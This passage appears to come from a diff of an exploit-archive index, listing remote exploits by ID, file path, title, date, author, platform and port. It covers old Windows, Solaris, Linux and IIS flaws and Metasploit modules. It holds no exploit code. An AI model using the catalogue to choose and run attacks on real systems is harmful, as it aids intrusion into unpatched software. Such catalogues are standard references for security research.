(Metasploit)",2012-06-10,Metasploit,remote,windows, +19028,exploits/linux/remote/19028.txt,"Berkeley Sendmail 5.58 - Debug",1988-08-01,anonymous,remote,linux, +19033,exploits/windows/remote/19033.txt,"Microsoft IIS 6.0/7.5 (+ PHP) - Multiple Vulnerabilities",2012-06-10,kingcope,remote,windows, +19039,exploits/bsd/remote/19039.txt,"BSD 4.2 - 'fingerd' Remote Buffer Overflow",1988-10-01,anonymous,remote,bsd, +19040,exploits/solaris/remote/19040.txt,"SunView (SunOS 4.1.1) - 'selection_svc' Remote File Read",1990-08-14,"Peter Shipley",remote,solaris, +19044,exploits/solaris/remote/19044.txt,"SunOS 4.1.3 - LD_LIBRARY_PATH / LD_OPTIONS",1992-05-27,anonymous,remote,solaris, +19047,exploits/aix/remote/19047.txt,"Stalker Internet Mail Server 1.6 - Remote Buffer Overflow",2001-09-12,"David Luyer",remote,aix, +19048,exploits/aix/remote/19048.txt,"IRIX 6.4 - 'pfdisplay.cgi' Code Execution",1998-04-07,"J.A. Gutierrez",remote,aix, +19069,exploits/linux/remote/19069.txt,"Qualcomm Eudora Internet Mail Server 1.2 - Remote Buffer Overflow",1998-04-14,"Netstat Webmaster",remote,linux, +19079,exploits/linux/remote/19079.c,"id Software Solaris Quake II 3.13/3.14 / QuakeWorld 2.0/2.1 / Quake 1.9/3.13/3.14 - Command Execution",1998-05-01,"Mark Zielinski",remote,linux, +19081,exploits/multiple/remote/19081.txt,"Lynx 2.8 - Remote Buffer Overflow",1998-05-03,"Michal Zalewski",remote,multiple, +19083,exploits/windows/remote/19083.cpp,"Cheyenne Inoculan for Windows NT 4.0 - Share",1998-06-10,"Paul Boyer",remote,windows, +19084,exploits/multiple/remote/19084.txt,"Metainfo Sendmail 2.0/2.5 / MetaIP 3.1 - Upload / Execute Read Scripts",1998-06-30,"Jeff Forristal",remote,multiple, +19086,exploits/linux/remote/19086.c,"WU-FTPD 2.4.2 / SCO Open Server 5.0.5 / ProFTPd 1.2 pre1 - 'realpath' Remote Buffer Overflow (1)",1999-02-09,"smiler & cossack",remote,linux,21 +19087,exploits/linux/remote/19087.c,"WU-FTPD 2.4.2 / SCO Open Server 5.0.5 / ProFTPd 1.2 pre1 - 'realpath' Remote Buffer Overflow (2)",1999-02-09,"jamez & c0nd0r",remote,linux,21 +19091,exploits/hardware/remote/19091.py,"F5 BIG-IP - Authentication Bypass",2012-06-12,"David Kennedy (ReL1K)",remote,hardware, +19092,exploits/multiple/remote/19092.py,"MySQL - Authentication Bypass",2012-06-12,"David Kennedy (ReL1K)",remote,multiple, +19093,exploits/multiple/remote/19093.txt,"Allaire ColdFusion Server 4.0 - Remote File Display / Deletion / Upload / Execution",1998-12-25,rain.forest.puppy,remote,multiple, +19094,exploits/windows/remote/19094.txt,"Microsoft Internet Explorer 4/5 - DHTML Edit ActiveX Control File Stealing / Cross Frame Access",1999-04-22,"Georgi Guninsky",remote,windows, +19096,exploits/linux/remote/19096.c,"RedHat Linux 5.1 / Caldera OpenLinux Standard 1.2 - Mountd",1998-08-28,LucySoft,remote,linux, +19099,exploits/hardware/remote/19099.rb,"F5 BIG-IP - SSH Private Key Exposure (Metasploit)",2012-06-13,Metasploit,remote,hardware, +19101,exploits/unix/remote/19101.c,"Xi Graphics Maximum CDE 1.2.3/TriTeal TED CDE 4.3/Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (1)",1998-08-31,"NAI research team",remote,unix, +19102,exploits/unix/remote/19102.c,"Xi Graphics Maximum CDE 1.2.3/TriTeal TED CDE 4.3/Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (2)",1998-08-31,"NAI research team",remote,unix, +40434,exploits/php/remote/40434.rb,"FreePBX < 13.0.188 - Remote Command Execution (Metasploit)",2016-09-27,0x4148,remote,php, +19104,exploits/linux/remote/19104.c,"IBM AIX 3.2/4.1 / SCO Unixware 7.1.1 / SGI IRIX 5.3 / Sun Solaris 2.5.1 - Privilege Escalation",1997-11-24,anonymous,remote,linux, +19105,exploits/linux/remote/19105.c,"Muhammad A. Muquit wwwcount 2.3 - 'Count.cgi' Remote Buffer Overflow",1997-10-16,"Razvan Dragomirescu",remote,linux, +19107,exploits/linux/remote/19107.c,"Netscape Messaging Server 3.55 & University of Washington imapd 10.234 - Remote Buffer Overflow",1998-07-17,anonymous,remote,linux, +19109,exploits/linux/remote/19109.c,"Qualcomm qpopper 2.4 - POP Server Buffer Overflow (1)",1998-06-27,"Seth McGann",remote,linux, +19110,exploits/unix/remote/19110.c,"Qualcomm qpopper 2.4 - POP Server Buffer Overflow (2)",1998-06-27,"Miroslaw Grzybek",remote,unix, +19111,exploits/linux/remote/19111.c,"ISC BIND (Linux/BSD) - Remote Buffer Overflow (1)",1998-04-08,ROTShB,remote,linux, +19112,exploits/linux/remote/19112.c,"ISC BIND (Multiple OSes) - Remote Buffer Overflow (2)",1998-04-08,prym,remote,linux, +19113,exploits/windows/remote/19113.txt,"Microsoft Windows NT 3.5.1 SP2/3.5.1 SP3/3.5.1 SP4/3.5.1 SP5/4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 - TelnetD",1999-01-02,"Tomas Halgas",remote,windows,23 +19118,exploits/multiple/remote/19118.txt,"Microsoft IIS 3.0/4.0 / Microsoft Personal Web Server 2.0/3.0/4.0 - ASP Alternate Data Streams",1998-01-01,"Paul Ashton",remote,multiple, +19119,exploits/linux/remote/19119.c,"HP HP-UX 10.34 rlpdaemon - Remote Overflow",1998-07-06,"RSI Advise",remote,linux, +19120,exploits/multiple/remote/19120.txt,"Ralf S. Engelschall ePerl 2.2.12 - Handling of ISINDEX Query",1998-07-06,"Luz Pinto",remote,multiple, +19121,exploits/multiple/remote/19121.txt,"Ray Chan WWW Authorization Gateway 0.1 - Command Execution",1998-07-08,"Albert Nubdy",remote,multiple, +19123,exploits/linux/remote/19123.c,"SCO Open Server 5.0.4 - POP Server Buffer Overflow",1998-07-13,"Vit Andrusevich",remote,linux, +19124,exploits/linux/remote/19124.txt,"HP JetAdmin 1.0.9 Rev. D - symlink",1998-07-15,emffmmadffsdf,remote,linux, +19127,exploits/multiple/remote/19127.txt,"Verity Search97 2.1 - Security",1998-07-14,"Stefan Arentz",remote,multiple, +19129,exploits/multiple/remote/19129.txt,"Microsoft IIS 4.0 / Microsoft Site Server 3.0 - Showcode ASP",1999-05-07,L0pht,remote,multiple, +19131,exploits/windows/remote/19131.py,"XM Easy Personal FTP Server 5.30 - Remote Format String Write4",2012-06-14,mr_me,remote,windows, +19141,exploits/windows/remote/19141.rb,"Microsoft Internet Explorer - Same ID Property Deleted Object Handling Memory Corruption (MS12-037) (Metasploit)",2012-06-14,Metasploit,remote,windows, +19147,exploits/windows/remote/19147.txt,"Microsoft IIS 4 (Windows NT) - Remote Web-Based Administration",1999-01-14,Mnemonix,remote,windows, +19149,exploits/windows/remote/19149.c,"Microsoft IIS 4 (Windows NT) - Log Avoidance",1999-01-22,Mnemonix,remote,windows, +19152,exploits/windows/remote/19152.txt,"Microsoft IIS 5.0 - IISAPI Extension Enumerate Root Web Server Directory",1999-01-26,Mnemonix,remote,windows, +19387,exploits/windows/remote/19387.rb,"Apple iTunes 10 - Extended M3U Stack Buffer Overflow (Metasploit)",2012-06-25,Metasploit,remote,windows, +19156,exploits/windows/remote/19156.txt,"Microsoft Internet Explorer 5.0.1 - Invalid Byte Cross-Frame Access",1999-01-28,"Georgi Guninski",remote,windows, +19402,exploits/hardware/remote/19402.txt,"Western Digital's WD TV Live SMP/Hub - Privilege Escalation",2012-06-26,"Wolfgang Borst",remote,hardware, +19164,exploits/windows/remote/19164.txt,"Microsoft Internet Explorer 4 - Clipboard Paste",1999-01-21,"Juan Carlos Garcia Cuartango",remote,windows, +19177,exploits/windows/remote/19177.rb,"ComSndFTP 1.3.7 Beta - USER Format String (Write4) (Metasploit)",2012-06-15,Metasploit,remote,windows, +19186,exploits/windows/remote/19186.rb,"Microsoft XML Core Services - MSXML Uninitialized Memory Corruption (MS12-043) (Metasploit)",2012-06-16,Metasploit,remote,windows, +19193,exploits/multiple/remote/19193.txt,"Allaire Forums 2.0.4 - Getfile",1999-02-11,"Cameron Childress",remote,multiple, +19194,exploits/multiple/remote/19194.txt,"Microsoft IIS 3.0/4.0 - Using ASP and FSO To Read Server Files",1999-02-11,"Gary Geisbert",remote,multiple, +19197,exploits/windows/remote/19197.txt,"Microsoft Windows NT 4.0 SP5 / Terminal Server 4.0 - 'Pass the Hash' with Modified SMB Client",1997-04-08,"Paul Ashton",remote,windows, +19208,exploits/windows/remote/19208.txt,"Microsoft Site Server Commerce Edition 3.0 alpha - AdSamples Sensitive Information",1999-05-11,"Andrey Kruchkov",remote,windows, +19218,exploits/linux/remote/19218.c,"Cat Soft Serv-U FTP Server 2.5 - Remote Buffer Overflow",1999-05-03,"Arne Vidstrom",remote,linux, +19219,exploits/linux/remote/19219.c,"BisonWare BisohFTP Server 3.5 - Multiple Vulnerabilities",1999-05-17,"Arne Vidstrom",remote,linux, +19221,exploits/multiple/remote/19221.txt,"SmartDesk WebSuite 2.1 - Remote Buffer Overflow",1999-05-25,cmart,remote,multiple, +19222,exploits/multiple/remote/19222.txt,"Gordano NTMail 4.2 - Web File Access",1999-05-25,Marc,remote,multiple, +19223,exploits/multiple/remote/19223.txt,"FloosieTek FTGate 2.1 - Web File Access",1999-05-25,Marc,remote,multiple, +19224,exploits/windows/remote/19224.c,"Computalynx CMail 2.3 - Web File Access",1999-05-25,Marc,remote,windows, +19226,exploits/linux/remote/19226.c,"University of Washington pop2d 4.4 - Remote Buffer Overflow",1999-05-26,"Chris Evans",remote,linux, +19231,exploits/windows/remote/19231.rb,"PHP 5.4.3 - apache_request_headers Function Buffer Overflow (Metasploit)",2012-06-17,Metasploit,remote,windows, +19236,exploits/solaris/remote/19236.txt,"Solaris 7.0 - 'Coredump' File Write",1996-08-03,"Jungseok Roh",remote,solaris, +19237,exploits/aix/remote/19237.txt,"Gordano NTMail 3.0/5.0 - SPAM Relay",1999-06-08,Geo,remote,aix, +19239,exploits/windows/remote/19239.txt,"Microsoft IIS (Windows NT 4.0/SP1/SP2/SP3/SP4/SP5) - '.IDC' Path Mapping",1999-06-04,"Scott Danahy",remote,windows, +19242,exploits/multiple/remote/19242.txt,"CdomainFree 2.4 - Remote Command Execution",1999-06-01,"Salvatore Sanfilippo -antirez-",remote,multiple, +19245,exploits/windows/remote/19245.pl,"Microsoft IIS 4.0 - Remote Buffer Overflow (1)",1999-06-15,"eEye Digital Security Team",remote,windows, +19246,exploits/windows/remote/19246.pm,"Microsoft IIS 4.0 - Remote Buffer Overflow (2)",1999-06-15,Stinko,remote,windows, +19247,exploits/linux/remote/19247.c,"Microsoft IIS 4.0 - Remote Buffer Overflow (3)",1999-06-15,"eeye security",remote,linux, +19248,exploits/windows/remote/19248.c,"Microsoft IIS 4.0 - Remote Buffer Overflow (4)",1999-06-15,"Greg Hoglund",remote,windows, +19251,exploits/linux/remote/19251.c,"tcpdump 3.4 - Protocol Four / Zero Header Length",1999-06-16,badi,remote,linux, +19253,exploits/linux/remote/19253.txt,"Debian 2.1 - httpd",1999-06-17,anonymous,remote,linux, +19266,exploits/windows/remote/19266.py,"EZHomeTech Ezserver 6.4 - Remote Stack Overflow",2012-06-18,modpr0be,remote,windows, +19288,exploits/windows/remote/19288.py,"HP Data Protector Client - EXEC_CMD Remote Code Execution",2012-06-19,"Ben Turner",remote,windows, +19291,exploits/windows/remote/19291.rb,"EZHomeTech EzServer 6.4.017 - Remote Stack Buffer Overflow (Metasploit)",2012-06-19,Metasploit,remote,windows, +19295,exploits/windows/remote/19295.rb,"Adobe Flash Player - AVM Verification Logic Array Indexing Code Execution (Metasploit)",2012-06-20,Metasploit,remote,windows, +19601,exploits/windows/remote/19601.txt,"etype eserv 2.50 - Directory Traversal",1999-11-04,"Ussr Labs",remote,windows, +19297,exploits/linux/remote/19297.c,"IBM Scalable POWERparallel (SP) 2.0 - 'sdrd' File Read",1998-08-05,"Chuck Athey & Jim Garlick",remote,linux, +19298,exploits/multiple/remote/19298.txt,"SGI IRIX 6.2 - cgi-bin wrap",1997-04-19,"J.A. Gutierrez",remote,multiple, +19299,exploits/multiple/remote/19299.txt,"SGI IRIX 6.3 - cgi-bin 'webdist.cgi' Command Execution",1997-05-06,anonymous,remote,multiple, +19303,exploits/multiple/remote/19303.txt,"SGI IRIX 6.4 - cgi-bin handler",1997-06-16,"Razvan Dragomirescu",remote,multiple, +19316,exploits/irix/remote/19316.c,"SGI IRIX 6.5.2 - 'nsd' Information Gathering",1999-05-31,"Jefferson Ogata",remote,irix, +19322,exploits/windows/remote/19322.rb,"Apple iTunes 10.6.1.7 - Extended m3u Stack Buffer Overflow (Metasploit)",2012-06-21,Rh0,remote,windows, +19327,exploits/solaris/remote/19327.c,"Sun Solaris 2.5.1 - rpc.statd rpc Call Relaying",1999-06-07,anonymous,remote,solaris, +19348,exploits/aix/remote/19348.txt,"IBM AIX 3.2.5 - 'login(1)' Privilege Escalation",1996-12-04,anonymous,remote,aix, +19407,exploits/windows/remote/19407.py,"Symantec pcAnywhere 12.5.0 - 'Login' / 'Password' Remote Buffer Overflow",2012-06-27,"S2 Crew",remote,windows, +19361,exploits/windows/remote/19361.txt,"Microsoft IIS 3.0/4.0 - Double Byte Code Page",1999-06-24,Microsoft,remote,windows, +19363,exploits/multiple/remote/19363.txt,"Netscape FastTrack Server 3.0.1 - Fasttrack Root Directory Listing",1999-06-07,"Jesús López de Aguileta",remote,multiple, +19365,exploits/netware/remote/19365.txt,"Novell Netware 4.1/4.11 - SP5B NDS Default Rights",1999-04-09,"Simple Nomad",remote,netware, +19369,exploits/windows/remote/19369.rb,"Adobe Flash Player - Object Type Confusion (Metasploit)",2012-06-25,Metasploit,remote,windows, +19383,exploits/multiple/remote/19383.txt,"Qbik WinGate Standard 3.0.5 - Log Service Directory Traversal",1999-02-22,eEYe,remote,multiple, +19420,exploits/multiple/remote/19420.c,"Caldera OpenUnix 8.0/UnixWare 7.1.1 / HP HP-UX 11.0 / Solaris 7.0 / SunOS 4.1.4 - rpc.cmsd Buffer Overflow (1)",1999-07-13,"Last Stage of Delirium",remote,multiple, +19421,exploits/multiple/remote/19421.c,"Caldera OpenUnix 8.0/UnixWare 7.1.1 / HP HP-UX 11.0 / Solaris 7.0 / SunOS 4.1.4 - rpc.cmsd Buffer Overflow (2)",1999-07-13,jGgM,remote,multiple, +19424,exploits/windows/remote/19424.pl,"Microsoft Data Access Components (MDAC) 2.1 / Microsoft IIS 3.0/4.0 / Microsoft Index Server 2.0 / Microsoft Site Server Commerce Edition 3.0 i386 MDAC - RDS (1)",1999-07-19,"rain forest puppy",remote,windows, +19426,exploits/multiple/remote/19426.c,"SGI Advanced Linux Environment 3.0 / SGI IRIX 6.5.4 / SGI UNICOS 10.0 6 - arrayd.auth Default Configuration",1999-07-19,"Last Stage of Delirium",remote,multiple, +19435,exploits/windows/remote/19435.html,"Microsoft JET 3.5/3.51/4.0 - VBA Shell",1999-07-29,BrootForce,remote,windows, +19442,exploits/windows/remote/19442.html,"Compaq Java Applet for Presario SpawnApp - Code Execution",1998-11-28,"Frank Farance",remote,windows, +19443,exploits/multiple/remote/19443.txt,"Netscape Enterprise Server 3.51/3.6 - JHTML View Source",1999-07-30,"David Litchfield",remote,multiple, +19444,exploits/hardware/remote/19444.txt,"Network Security Wizards Dragon-Fire IDS 1.0 - Command Execution",1999-08-05,"Stefan Lauda",remote,hardware, +19448,exploits/windows/remote/19448.c,"ToxSoft NextFTP 1.82 - Remote Buffer Overflow",1999-08-03,UNYUN,remote,windows, +19449,exploits/windows/remote/19449.c,"Fujitsu Chocoa 1.0 beta7R - 'Topic' Remote Buffer Overflow",1999-08-03,UNYUN,remote,windows, +19450,exploits/windows/remote/19450.c,"CREAR ALMail32 1.10 - Remote Buffer Overflow",1999-08-08,UNYUN,remote,windows, +19451,exploits/multiple/remote/19451.txt,"Microsoft Windows 98a/98b/98SE / Solaris 2.6 - IRDP",1999-08-11,L0pth,remote,multiple, +19458,exploits/linux/remote/19458.c,"Linux Kernel 2.0.30/2.0.35/2.0.36/2.0.37 - Blind TCP Spoofing",1999-07-31,Nergal,remote,linux, +19459,exploits/multiple/remote/19459.txt,"Hybrid Ircd 5.0.3 p7 - Remote Buffer Overflow",1999-08-13,"jduck & stranjer",remote,multiple, +19466,exploits/multiple/remote/19466.txt,"Hughes Technologies Mini SQL (mSQL) 2.0/2.0.10 - Information Disclosure",1999-08-18,"Gregory Duchemin",remote,multiple, +19468,exploits/windows/remote/19468.txt,"Microsoft Internet Explorer 5 - ActiveX Object For Constructing Type Libraries For Scriptlets File Write",1999-08-21,"Georgi Guninski",remote,windows, +19475,exploits/linux/remote/19475.c,"ProFTPd 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (1)",1999-08-17,"babcia padlina ltd",remote,linux, +19476,exploits/linux/remote/19476.c,"ProFTPd 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (2)",1999-08-27,anonymous,remote,linux, +19478,exploits/unix/remote/19478.c,"BSD/OS 3.1/4.0.1 / FreeBSD 3.0/3.1/3.2 / RedHat Linux 6.0 - 'amd' Remote Buffer Overflow (1)",1999-08-31,Taeho,remote,unix, +19479,exploits/unix/remote/19479.c,"BSD/OS 3.1/4.0.1 / FreeBSD 3.0/3.1/3.2 / RedHat Linux 6.0 - 'amd' Remote Buffer Overflow (2)",1999-08-30,c0nd0r,remote,unix, +19484,exploits/windows/remote/19484.rb,"HP Data Protector - Create New Folder Buffer Overflow (Metasploit)",2012-07-01,Metasploit,remote,windows,3817 +19486,exploits/windows/remote/19486.c,"Netscape Communicator 4.06/4.5/4.6/4.51/4.61 - EMBED Buffer Overflow",1999-09-02,"R00t Zer0",remote,windows, +19487,exploits/windows/remote/19487.txt,"Microsoft Internet Explorer 4/5 - ActiveX 'Eyedog' Remote Overflow",1999-08-21,"Shane Hird's",remote,windows, +19490,exploits/windows/remote/19490.txt,"Microsoft Internet Explorer 4.0.1/5 - Import/Export Favorites",1999-09-10,"Georgi Guninski",remote,windows, +19491,exploits/windows/remote/19491.txt,"BindView HackerShield 1.0/1.1 - HackerShield AgentAdmin Password",1999-09-10,anonymous,remote,windows, +19492,exploits/multiple/remote/19492.txt,"Microsoft Internet Explorer 5 / Netscape Communicator 4.0/4.5/4.6 - JavaScript STYLE",1999-09-13,"Georgi Guninski",remote,multiple, +19493,exploits/multiple/remote/19493.txt,"Netscape Enterprise Server 3.51/3.6 SP2 - Accept Buffer Overflow",1999-09-13,"Nobuo Miwa",remote,multiple, +19494,exploits/windows/remote/19494.c,"NetcPlus SmartServer 3.5.1 - SMTP Buffer Overflow",1999-09-13,UNYUN,remote,windows, +19495,exploits/windows/remote/19495.c,"Computalynx CMail 2.3 SP2/2.4 - SMTP Buffer Overflow",1999-09-13,UNYUN,remote,windows, +19496,exploits/windows/remote/19496.c,"FuseWare FuseMail 2.7 - POP Mail Buffer Overflow",1999-09-13,UNYUN,remote,windows, +19503,exploits/linux/remote/19503.txt,"ProFTPd 1.2 pre6 - 'snprintf' Remote Root",1999-09-17,"Tymm Twillman",remote,linux, +19514,exploits/windows/remote/19514.txt,"Adobe Acrobat ActiveX Control 1.3.188 - ActiveX Buffer Overflow",1999-09-27,"Shane Hird",remote,windows, +19515,exploits/windows/remote/19515.txt,"Microsoft Internet Explorer 4 (Windows 95/NT 4.0) - Setupctl ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",remote,windows, +19520,exploits/bsd/remote/19520.txt,"BSD - 'TelnetD' Remote Command Execution (2)",2012-07-01,kingcope,remote,bsd, +19521,exploits/windows/remote/19521.txt,"Microsoft Internet Explorer 5.0/4.0.1 - hhopen OLE Control Buffer Overflow",1999-09-27,"Shane Hird",remote,windows, +19522,exploits/linux/remote/19522.txt,"Linux Kernel 2.2 - Predictable TCP Initial Sequence Number",1999-09-27,"Stealth & S. Krahmer",remote,linux, +19530,exploits/windows/remote/19530.txt,"Microsoft Internet Explorer 5 - Download Behaviour",1999-09-27,"Georgi Guninski",remote,windows, +19532,exploits/aix/remote/19532.pl,"IBM AIX 4.3.2 - 'ftpd' Remote Buffer Overflow",1999-09-28,Gerrie,remote,aix, +19537,exploits/windows/remote/19537.txt,"teamshare teamtrack 3.0 - Directory Traversal",1999-10-02,"rain forest puppy",remote,windows, +19538,exploits/hardware/remote/19538.txt,"Hybrid Networks Cable Broadband Access System 1.0 - Remote Configuration",1999-10-05,KSR[T],remote,hardware, +19539,exploits/windows/remote/19539.txt,"Microsoft Internet Explorer 5.0/4.0.1 - iFrame",1999-10-11,"Georgi Guninski",remote,windows, +19540,exploits/windows/remote/19540.txt,"t. hauck jana WebServer 1.0/1.45/1.46 - Directory Traversal",1999-10-08,"Jason Lutz",remote,windows, +19553,exploits/php/remote/19553.txt,"PHP/FI 1.0/FI 2.0/FI 2.0 b10 - mylog/mlog",1997-10-19,"Bryan Berg",remote,php, +19554,exploits/hardware/remote/19554.c,"Lucent Ascend MAX 5.0/Pipeline 6.0/TNT 1.0/2.0 Router - MAX UDP Port 9 (1)",1998-03-16,Rootshell,remote,hardware, +19555,exploits/hardware/remote/19555.pl,"Lucent Ascend MAX 5.0/Pipeline 6.0/TNT 1.0/2.0 Router - MAX UDP Port 9 (2)",1998-03-17,Rootshell,remote,hardware, +19557,exploits/linux/remote/19557.txt,"John S.2 Roberts AnyForm 1.0/2.0 - CGI Semicolon",1995-07-31,"Paul Phillips",remote,linux, +19558,exploits/linux/remote/19558.c,"OpenLink Software OpenLink 3.2 - Remote Buffer Overflow",1999-10-15,"Tymm Twillman",remote,linux, +19559,exploits/windows/remote/19559.txt,"Microsoft Internet Explorer 5.0/4.0.1 - JavaScript URL Redirection (MS99-043)",1999-10-18,"Georgi Guninski",remote,windows, +19560,exploits/multiple/remote/19560.c,"Washington University WU-FTPD 2.5.0 - 'message' Remote Buffer Overflow",1999-10-19,typo/teso,remote,multiple, +19561,exploits/windows/remote/19561.c,"True North Software Internet Anywhere Mail Server 2.3.x - Mail Server Multiple Buffer Overflow",1999-10-01,"Arne Vidstrom",remote,windows, +19566,exploits/windows/remote/19566.c,"Omnicron OmniHTTPd 1.1/2.4 Pro - Remote Buffer Overflow",1999-10-22,UNYUN,remote,windows, +19567,exploits/linux/remote/19567.txt,"National Science Foundation Squid Web Proxy 1.0/1.1/2.1 - Authentication Failure",1999-10-25,"Oezguer Kesim",remote,linux, +19568,exploits/windows/remote/19568.txt,"Pacific Software URL Live! 1.0 - Directory Traversal",1999-10-28,UNYUN,remote,windows, +19570,exploits/windows/remote/19570.txt,"WFTPD 2.34/2.40/3.0 - Remote Buffer Overflow",1999-11-04,"Alberto Solino",remote,windows, +19576,exploits/windows/remote/19576.rb,"IBM Rational ClearQuest CQOle - Remote Code Execution (Metasploit)",2012-07-05,Metasploit,remote,windows, +19580,exploits/windows/remote/19580.txt,"Avirt Gateway Suite 3.3 a/3.5 - Mail Server Buffer Overflow (1)",1999-10-31,"Luck Martins",remote,windows, +19581,exploits/windows/remote/19581.txt,"Avirt Gateway Suite 3.3 a/3.5 - Mail Server Buffer Overflow (2)",1999-10-31,"dark spyrit",remote,windows, +19584,exploits/windows/remote/19584.c,"Sky Communications Skyfull 1.1.4 Mail Server - MAIL FROM Buffer Overflow",1999-10-30,UNYUN,remote,windows, +19586,exploits/windows/remote/19586.c,"BTD Studio Zom-Mail 1.0.9 - Remote Buffer Overflow",1999-11-02,UNYUN,remote,windows, +19587,exploits/windows/remote/19587.txt,"AN-HTTPd 1.2b - CGI s",1999-11-02,UNYUN,remote,windows, +19588,exploits/windows/remote/19588.c,"IBM HomePagePrint 1.0 7 - Remote Buffer Overflow",1999-11-02,UNYUN,remote,windows, +19589,exploits/windows/remote/19589.txt,"Avirt Gateway Suite 3.3/3.3 a/3.5 - Directory Creation",1999-10-31,"Jesús López de Aguileta",remote,windows, +19591,exploits/windows/remote/19591.txt,"Microsoft Internet Explorer 4/5 / Outlook 98 - 'window.open' Redirect",1999-11-04,"Georgi Guninski",remote,windows, +19592,exploits/windows/remote/19592.asm,"Real Networks GameHouse dldisplay ActiveX control - Port Buffer Overflow (1)",1999-11-04,"dark spyrit",remote,windows, +19593,exploits/windows/remote/19593.c,"Real Networks GameHouse dldisplay ActiveX control - Port Buffer Overflow (2)",1999-11-04,"dark spyrit",remote,windows, +19595,exploits/windows/remote/19595.c,"Computer Software Manufaktur Alibaba 2.0 - Multiple CGI Vulnerabilities",1999-11-03,Kerb,remote,windows, +19603,exploits/windows/remote/19603.txt,"Microsoft Internet Explorer 4.x/5 / Outlook 2000 0/98 0/Express 4.x - ActiveX '.CAB' File Execution",1999-11-08,Mukund,remote,windows, +20122,exploits/windows/remote/20122.rb,"Microsoft Office SharePoint Server 2007 - Remote Code Execution (MS10-104) (Metasploit)",2012-07-31,Metasploit,remote,windows,8082 +20120,exploits/windows/remote/20120.pl,"httpdx 1.5.4 - Remote Heap Overflow",2012-07-29,st3n,remote,windows, +19903,exploits/multiple/remote/19903.txt,"Gossamer Threads DBMan 2.0.4 - DBMan Information Leakage",2000-05-05,"Black Watch Labs",remote,multiple, +19607,exploits/windows/remote/19607.c,"Microsoft Windows 95/98 - UNC Buffer Overflow (1)",1999-11-09,UNYUN,remote,windows, +19608,exploits/windows/remote/19608.c,"Microsoft Windows 95/98 - UNC Buffer Overflow (2)",1999-11-09,UNYUN,remote,windows, +19611,exploits/windows/remote/19611.txt,"TransSoft Broker FTP Server 3.0 x/4.0 - User Name Buffer Overflow",1999-11-08,"Ussr Labs",remote,windows, +19612,exploits/windows/remote/19612.pl,"Trend Micro Interscan VirusWall 3.2.3/3.3 - 'HELO' Remote Buffer Overflow (1)",1999-11-07,"Alain Thivillon & Stephane Aubert",remote,windows, +19613,exploits/windows/remote/19613.rb,"Poison Ivy 2.3.2 (C2 Server) - Remote Buffer Overflow (Metasploit)",2012-07-06,Metasploit,remote,windows,3460 +19614,exploits/windows/remote/19614.asm,"Trend Micro Interscan VirusWall 3.2.3/3.3 - 'HELO' Remote Buffer Overflow (2)",1999-11-07,"dark spyrit",remote,windows, +19617,exploits/windows/remote/19617.txt,"NetcPlus SmartServer3 3.5.1 - POP Buffer Overflow",1999-11-11,"Ussr Labs",remote,windows, +19618,exploits/windows/remote/19618.txt,"Microsoft Internet Explorer 5 Media Player - ActiveX Error Message",1999-11-14,"Georgi Guninski",remote,windows, +19620,exploits/unix/remote/19620.txt,"Matt Wright - 'FormHandler.cgi' 2.0 Reply Attachment",1999-11-16,m4rcyS,remote,unix, +19621,exploits/windows/remote/19621.c,"Admiral Systems EmailClub 1.0.0.5 - Remote Buffer Overflow",1999-11-15,UNYUN,remote,windows, +19622,exploits/windows/remote/19622.c,"Antelope Software W4-Server 2.6 a/Win32 - 'Cgitest.exe' Remote Buffer Overflow",1999-11-15,UNYUN,remote,windows, +19623,exploits/windows/remote/19623.c,"International TeleCommunications WebBBS 2.13 - login & Password Buffer Overflow",1999-11-15,UNYUN,remote,windows, +19625,exploits/windows/remote/19625.py,"ALLMediaServer 0.8 - Remote Overflow (SEH)",2012-07-06,"motaz reda",remote,windows,888 +19632,exploits/hardware/remote/19632.txt,"Tektronix Phaser Network Printer 740/750/750DP/840/930 PhaserLink WebServer - Retrieve Administrator Password",1999-11-17,"Dennis W. Mattison",remote,hardware, +19634,exploits/linux/remote/19634.c,"ETL Delegate 5.9.x/6.0.x - Remote Buffer Overflow",1999-11-13,scut,remote,linux, +19637,exploits/windows/remote/19637.txt,"Microsoft Internet Explorer 5 (Windows 95/98/2000/NT 4.0) - XML HTTP Redirect",1999-11-22,"Georgi Guninksi",remote,windows, +19644,exploits/multiple/remote/19644.txt,"symantec mail-gear 1.0 - Directory Traversal",1999-11-29,"Ussr Labs",remote,multiple, +19645,exploits/unix/remote/19645.c,"Qualcomm qpopper 3.0/3.0 b20 - Remote Buffer Overflow (1)",1999-11-30,Mixter,remote,unix, +19646,exploits/unix/remote/19646.pl,"Qualcomm qpopper 3.0/3.0 b20 - Remote Buffer Overflow (2)",1999-11-30,"Synnergy Networks",remote,unix, +19662,exploits/windows/remote/19662.txt,"Microsoft Internet Explorer 4.1/5.0/4.0.1 - Subframe Spoofing",1999-11-30,"Georgi Guninski",remote,windows, +19663,exploits/solaris/remote/19663.c,"Solaris 2.3/2.4/2.5/2.5.1/2.6/7.0 snoop - 'print_domain_name' Remote Buffer Overflow",1999-12-07,K2,remote,solaris, +19667,exploits/multiple/remote/19667.c,"WolfPack Development XSHIPWARS 1.0/1.2.4 - Remote Buffer Overflow",1999-12-09,"Amanda Woodward",remote,multiple, +19668,exploits/solaris/remote/19668.c,"Solaris 2.5/2.5.1/2.6/7.0 - 'sadmind' Remote Buffer Overflow (1)",1999-06-24,"Cheez Whiz",remote,solaris, +19669,exploits/solaris/remote/19669.c,"Solaris 2.5/2.5.1/2.6/7.0 - 'sadmind' Remote Buffer Overflow (2)",1999-06-24,"Cheez Whiz",remote,solaris, +19670,exploits/solaris/remote/19670.c,"Solaris 2.5/2.5.1/2.6/7.0 - 'sadmind' Remote Buffer Overflow (3)",2000-11-10,"nikolai abromov",remote,solaris, +19672,exploits/solaris/remote/19672.c,"Solaris 2.5/2.5.1/2.6/7.0 - 'sadmind' Remote Buffer Overflow (4)",1999-12-10,"Cheez Whiz",remote,solaris, +19679,exploits/windows/remote/19679.txt,"Infoseek Ultraseek 2.1/3.1 for NT - GET Buffer Overflow",1999-12-15,"Ussr Labs",remote,windows, +19680,exploits/sco/remote/19680.c,"SCO Unixware 7.1 - i2odialogd Remote Buffer Overflow",1999-12-22,"Brock Tellier",remote,sco, 